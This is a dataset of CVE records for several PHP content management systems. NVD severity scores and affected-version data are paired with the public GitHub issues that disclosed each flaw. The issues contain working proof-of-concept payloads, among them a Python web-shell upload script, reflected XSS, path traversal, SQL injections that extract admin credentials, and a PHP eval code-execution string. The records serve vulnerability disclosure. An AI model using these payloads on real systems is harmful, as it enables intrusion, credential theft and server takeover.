I found Unrestricted File Upload in `http://localhost/bloofoxCMS/admin/index.php?mode=user&action=profile&userid=[ID]` -> `filename` param, the `filename` param only checks the MIME type which that can be bypassed. ## PoC :- ```python import requests sid = 'xxxxxxxxxxxxxxxxxxxxxxxxxx' # The Admin Session url = "http://localhost/bloofoxCMS/bloofoxCMS/admin/index.php?page=myprofile" data = {'username':'admin','send':'Save'} r = requests.post(url, data=data, headers={'Cookie':'sid='+sid+';'},files={'filename': ('texst.php', "<?=`$_GET[1]`;", 'image/jpeg')}).text.split('/media/images/profiles/')[1].split("'")[0] print('Your Shell in http://localhost/bloofoxCMS//admin/media/images/profiles/'+r) ``` ## Impact Upload Backdoor PHP Files that leads to control the victim webserver
Authenticated Unrestricted File Upload in 'profile' action
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/9/comments
0
2020-12-27T10:31:18Z
2020-12-27T10:31:59Z
https://github.com/alexlang24/bloofoxCMS/issues/9
775,013,592
9
2,060
CVE-2020-35761
2021-06-16T16:15:07.997
bloofoxCMS 0.5.2.1 is infected with XSS that allows remote attackers to execute arbitrary JS/HTML Code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "C12BED64-DA1B-4FB8-A196-B414759D79C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alexlang24/bloofoxCMS/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
I found an Authenticated RXSS in 'fileurl' parameter, the 'fileurl' input was not safely sanitized. ## PoC :- ![p0c](https://k.top4top.io/p_1822gu1301.jpg) http://localhost/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=<script>alert(1)</script> ## Impact The attacker can execute a HTML/JS Code (the attacker can stealing cookies,etc..) ## Fix Use [htmlspecialchars](https://www.php.net/manual/en/function.htmlspecialchars.php) function
Authenticated RXSS in 'fileurl' parameter
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/8/comments
0
2020-12-27T09:44:47Z
2020-12-27T09:44:47Z
https://github.com/alexlang24/bloofoxCMS/issues/8
775,007,650
8
2,061
CVE-2020-35762
2021-06-16T16:15:08.030
bloofoxCMS 0.5.2.1 is infected with Path traversal in the 'fileurl' parameter that allows attackers to read local files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 2.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "C12BED64-DA1B-4FB8-A196-B414759D79C4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/alexlang24/bloofoxCMS/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
I discovered a Path traversal Vulnerability in 'fileurl' parameter, the 'fileurl' input does not avoid (./\) in user-input which that leads to Path traversal Vulnerability. ## PoC :- ![poc](https://e.top4top.io/p_1822l71a31.jpg) http://localhost.fiddler/bloofoxCMS/admin/index.php?mode=settings&page=editor&fileurl=../../../../../Windows/win.ini ## Impact Read local files in webserver
Authenticated Path traversal in 'fileurl' parameter that leads to read local files
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/11/comments
0
2020-12-27T11:15:54Z
2020-12-27T11:15:54Z
https://github.com/alexlang24/bloofoxCMS/issues/11
775,019,404
11
2,062
CVE-2020-22199
2021-06-16T17:15:07.613
SQL Injection vulnerability in phpCMS 2007 SP6 build 0805 via the digg_mod parameter to digg_add.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpcms:phpcms:2007:sp6:*:*:*:*:*:*", "matchCriteriaId": "97D86167-7F8F-4B84-AE31-125B3F139848", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
today , i collect some traffic from internet and i found something like this. `GET //digg/digg_add.php?id=1&con=2&digg_mod=digg_data%2520WHERE%25201=2%2520+and(select%25201%2520from(select%2520count(*)%2cconcat((select%2520(select%2520(select%2520concat(0x7e%2cmd5(1234)%2c0x7e)))%2520from%2520information_schema.tables%2520limit%25200%2c1)%2cfloor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a)%2523 HTTP/1.1%0d%0aHost: 47.244.39.15%0d%0aConnection: keep-alive%0d%0aAccept: */*%0d%0aAccept-Encoding: gzip%2c deflate%0d%0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML%2c like Gecko) Version/5.1 Safari/534.50%0d%0a%0d%0a` so many scanner try to do some thiing . so i do some reserach .. ![image](https://user-images.githubusercontent.com/703783/74649235-21241080-51ba-11ea-96e8-3f66746a262d.png) it's easy...there is no filter in digg_add.php . the digg_mod trans to mod_id and get excute.
phpcms2007 sp6 digg_add.php SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/1/comments
0
2020-02-17T11:17:50Z
2020-02-17T11:17:50Z
https://github.com/blindkey/cve_like/issues/1
566,231,188
1
2,063
CVE-2020-22200
2021-06-16T17:15:07.647
Directory Traversal vulnerability in phpCMS 9.1.13 via the q parameter to public_get_suggest_keyword.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpcms:phpcms:9.1.13:*:*:*:*:*:*:*", "matchCriteriaId": "44C00652-2E76-4E91-AF1E-DD423C25982C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/blindkey/cve_like/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
some think like this in honeypot get my attension . `index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php` and i did some google ,found that in PHPCMS V9.1.13 .the file ![image](https://user-images.githubusercontent.com/703783/74652413-f38e9580-51c0-11ea-9420-050eb92ba665.png) q parame pass to file_get_content.. i do some more google ,and found that it still work...like below. ![image](https://user-images.githubusercontent.com/703783/74652361-deb20200-51c0-11ea-8e70-5d731625d81c.png)
PHPCMS V9.1.13 public_get_suggest_keyword any file read
https://api.github.com/repos/blindkey/cve_like/issues/2/comments
0
2020-02-17T12:06:58Z
2020-02-17T12:06:58Z
https://github.com/blindkey/cve_like/issues/2
566,255,833
2
2,064
CVE-2020-22201
2021-06-16T17:15:07.677
phpCMS 2008 sp4 allowas remote malicious users to execute arbitrary php commands via the pagesize parameter to yp/product.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/95.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/95.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpcms:phpcms:2008:sp4:*:*:*:*:*:*", "matchCriteriaId": "67C8848F-F0B8-445A-A20D-573943DA24EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/blindkey/cve_like/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
phpcms 2008 in yp/product.php ![image](https://user-images.githubusercontent.com/703783/74701208-fe890a80-5240-11ea-97c9-45bacc2ed3d9.png) there is no filter before or after the pagesize value pass to $urlrules ![image](https://user-images.githubusercontent.com/703783/74701227-0e085380-5241-11ea-9cdc-7acad24729e1.png) and after template render ,we come to a function which will evaluate the data like below: ![image](https://user-images.githubusercontent.com/703783/74701279-355f2080-5241-11ea-98e1-e831143517c8.png) so the evalutate will trigger a arbitry command injection. poc like this: /yp/product.php?pagesize=${@phpinfo()}
phpcms2008 product.php pagesize parameters RCE
https://api.github.com/repos/blindkey/cve_like/issues/4/comments
0
2020-02-18T03:32:57Z
2020-02-18T03:33:47Z
https://github.com/blindkey/cve_like/issues/4
566,623,955
4
2,065
CVE-2020-22203
2021-06-16T18:15:07.647
SQL Injection in phpCMS 2008 sp4 via the genre parameter to yp/job.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpcms:phpcms:2008:sp4:*:*:*:*:*:*", "matchCriteriaId": "67C8848F-F0B8-445A-A20D-573943DA24EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
/yp/job.php ![image](https://user-images.githubusercontent.com/703783/74704314-e61ded80-524a-11ea-9ff8-19442d76a060.png) genre parameters pass to sql command without filter poc: `GET /yp/job.php?action=applylist&inputtime=0&station=5&genre=%252561%252527%252520%252561%25256e%252564%252520%252528%252573%252565%25256c%252565%252563%252574%252520%252531%252520%252566%252572%25256f%25256d%252528%252573%252565%25256c%252565%252563%252574%252520%252563%25256f%252575%25256e%252574%252528%25252a%252529%25252c%252563%25256f%25256e%252563%252561%252574%252528%252528%252573%252565%25256c%252565%252563%252574%252520%252528%252573%252565%25256c%252565%252563%252574%252520%252528%252573%252565%25256c%252565%252563%252574%252520%252563%25256f%25256e%252563%252561%252574%252528%252530%252578%252537%252565%25252c%252530%252578%252532%252537%25252c%252570%252568%252570%252563%25256d%252573%25255f%25256d%252565%25256d%252562%252565%252572%25252e%252575%252573%252565%252572%25256e%252561%25256d%252565%25252c%252530%252578%252532%252537%25252c%252530%252578%252537%252565%252529%252520%252566%252572%25256f%25256d%252520%252570%252568%252570%252563%25256d%252573%25255f%25256d%252565%25256d%252562%252565%252572%252520%25256c%252569%25256d%252569%252574%252520%252530%25252c%252531%252529%252529%252520%252566%252572%25256f%25256d%252520%252569%25256e%252566%25256f%252572%25256d%252561%252574%252569%25256f%25256e%25255f%252573%252563%252568%252565%25256d%252561%25252e%252574%252561%252562%25256c%252565%252573%252520%25256c%252569%25256d%252569%252574%252520%252530%25252c%252531%252529%2525`
phpcms2008 /yp/job.php genre parameter sql inject
https://api.github.com/repos/blindkey/cve_like/issues/6/comments
0
2020-02-18T04:34:34Z
2020-02-18T04:34:34Z
https://github.com/blindkey/cve_like/issues/6
566,639,734
6
2,066
CVE-2020-22204
2021-06-16T18:15:07.683
SQL Injection in ECShop 2.7.6 via the goods_number parameter to flow.php. .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopex:ecshop:2.7.6:*:*:*:*:*:*:*", "matchCriteriaId": "900C5068-32DF-440B-BB4C-7C641FFD037C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
ecshop 2.7.6 flow.php src: https://github.com/shopex/ecshop/blob/master/upload/flow.php ![image](https://user-images.githubusercontent.com/703783/74704988-41e97600-524d-11ea-9dde-e0a81c21c145.png) flow_update_cart($_POST['goods_number']); so : ![image](https://user-images.githubusercontent.com/703783/74705020-62193500-524d-11ea-8ab4-391294732596.png) use to make value as int ,but forget to do the same with key vars .. so leads to sql inject . hackers can do this like : `goods_number[-1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,user_name,0x7c,password,0x27,0x7e)) from ecs_admin_user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# and '1'='1] = value`
ecshop 2.7.6 flow.php goods_number sql inject
https://api.github.com/repos/blindkey/cve_like/issues/7/comments
0
2020-02-18T04:53:25Z
2020-02-18T04:53:48Z
https://github.com/blindkey/cve_like/issues/7
566,644,854
7
2,067
CVE-2020-22205
2021-06-16T18:15:07.713
SQL Injection in ECShop 3.0 via the id parameter to admin/shophelp.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopex:ecshop:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F63CA0F3-9F7D-4F97-8BC8-1CE0A9C51780", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/8
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
ecshop 3.0 /admin/shophelp.php ![image](https://user-images.githubusercontent.com/703783/74706383-cc33d900-5251-11ea-9aa1-9b548214a172.png) at line 160,$id was passe to execute without filter and leads to sql inject
ecshop 3.0 /admin/shophelp.php id SQLinject
https://api.github.com/repos/blindkey/cve_like/issues/8/comments
0
2020-02-18T05:24:17Z
2020-02-18T05:24:17Z
https://github.com/blindkey/cve_like/issues/8
566,655,810
8
2,068
CVE-2020-22206
2021-06-16T18:15:07.740
SQL Injection in ECShop 3.0 via the aid parameter to admin/affiliate_ck.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:shopex:ecshop:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F63CA0F3-9F7D-4F97-8BC8-1CE0A9C51780", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
/admin/affiliate_ck.php ![image](https://user-images.githubusercontent.com/703783/74706989-72cca980-5253-11ea-9d65-c9514dd56282.png) auid parameters pass to sqladd without filter leads to sql inejct .
ecshop3.0 /admin/affiliate_ck.php aid SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/9/comments
0
2020-02-18T05:36:12Z
2020-02-18T05:36:12Z
https://github.com/blindkey/cve_like/issues/9
566,659,215
9
2,069
CVE-2020-22208
2021-06-16T18:15:07.770
SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/10" } ]
